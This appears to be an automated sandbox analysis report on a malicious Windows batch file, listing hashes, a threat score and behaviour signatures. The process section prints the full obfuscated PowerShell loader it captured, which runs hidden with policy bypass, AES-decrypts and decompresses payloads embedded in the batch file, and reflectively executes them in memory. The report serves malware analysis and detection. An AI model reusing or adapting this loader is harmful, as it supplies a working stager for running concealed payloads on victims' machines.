Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
27/02/2025, 02:36
General
-
Target
33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89.bat
-
Size
92KB
-
MD5
56156e92af196e2d50b95a298ccd72c6
-
SHA1
1a4813b0824e7b3ce1cb1da6fe1f232548d8159c
-
SHA256
33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89
-
SHA512
effb4585ff014a84b7afeb5906c93781f4514db528c0e11afd280b6d663a709042d8e668b9e3b87deeb4feb7de7110eb4b50eb37259991b4108ce6fef821651d
-
SSDEEP
1536:S2ieY0tuOX7Y3kT/veAk9eezSbyMLPlM4F0CkmelJjXW:CBmuW8UmkezSHLoCElA
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GCyt+CHAYOgHC8VzJzRgBO+OdR7UOxitDFTv1ekJA+Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0Yd0D5tzJ8h0YT6VILQ/ww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpWdl=New-Object System.IO.MemoryStream(,$param_var); $OzPba=New-Object System.IO.MemoryStream; $tZbeO=New-Object System.IO.Compression.GZipStream($ZpWdl, [IO.Compression.CompressionMode]::Decompress); $tZbeO.CopyTo($OzPba); $tZbeO.Dispose(); $ZpWdl.Dispose(); $OzPba.Dispose(); $OzPba.ToArray();}function execute_function($param_var,$param2_var){ $DJLHQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DLMsn=$DJLHQ.EntryPoint; $DLMsn.Invoke($null, $param2_var);}$gXUzW = 'C:\Users\Admin\AppData\Local\Temp\33554031f9ec302ee6640380fd88bc0aaea328591789d51e3a4b531e6ae17d89.bat';$host.UI.RawUI.WindowTitle = $gXUzW;$tdANz = [type]::GetType('System.IO.File');$XbyGs = [type]::GetType('System.Environment');$FoDmC = $tdANz::('txeTllAdaeR'[-1..-11] -join '')($gXUzW);$ITguX = $XbyGs::NewLine;$UsyQP = $FoDmC.Split($ITguX);$koCcE = $UsyQP;foreach ($WdDuV in $koCcE) { if ($WdDuV.StartsWith(':: ')) { $STBOT=$WdDuV.Substring(3); break; }}$payloads_var=[string[]]$STBOT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB